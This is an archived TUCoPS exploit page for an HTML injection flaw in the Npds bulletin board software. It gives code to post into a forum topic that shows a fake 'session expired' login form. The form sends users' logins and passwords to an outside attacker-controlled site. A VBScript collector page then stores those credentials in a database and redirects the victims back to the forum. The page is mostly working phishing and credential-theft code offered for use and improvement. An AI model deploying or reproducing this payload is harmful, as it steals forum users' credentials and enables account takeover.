Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: etc :: hack3942.htm

Npds BB HTML Injection



Npds BB HTML Injection



I release it very quickly ... So it can be improved :



Code to put in a reply or in a topic :



Your fake message
  Profil  href="http://www.userland.com" TARGET="_blank" CLASS="NOIR" TARGET="_blank">www  Citation   
action="http://mon-site-de-roxor.com/roxor.asp" method="post" name="piquage" target="_self">
Your session has expired. Please log in to reply.
 
Login :
Mot de passe :
 
Example of Code (VBscript) to put in the page called by the form in the topic : <%@ Language=VBScript %> <% set base=server.createobject("ADODB.CONNECTION") base.open nom_base, login_base, password_base referant=left(request.servervariables("HTTP_REFERER"),instr(8,request.servervariables("HTTP_REFERER"),"/")-1) login=Request.QueryString("login") password=Request.QueryString("password") requete_vol_infos="INSERT statistiques (date,npds,login,password) VALUES (getdate(),'" + cstr(referant) + "','" + cstr(login) + "','" + cstr(password) + "')" set resultat_vol_infos=server.CreateObject("ADODB.RECORDSET") resultat_vol_infos.Open requete_vol_infos, base response.redirect(referant) %> Thanks to N-0-X and NewFFR :o) Rituel


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH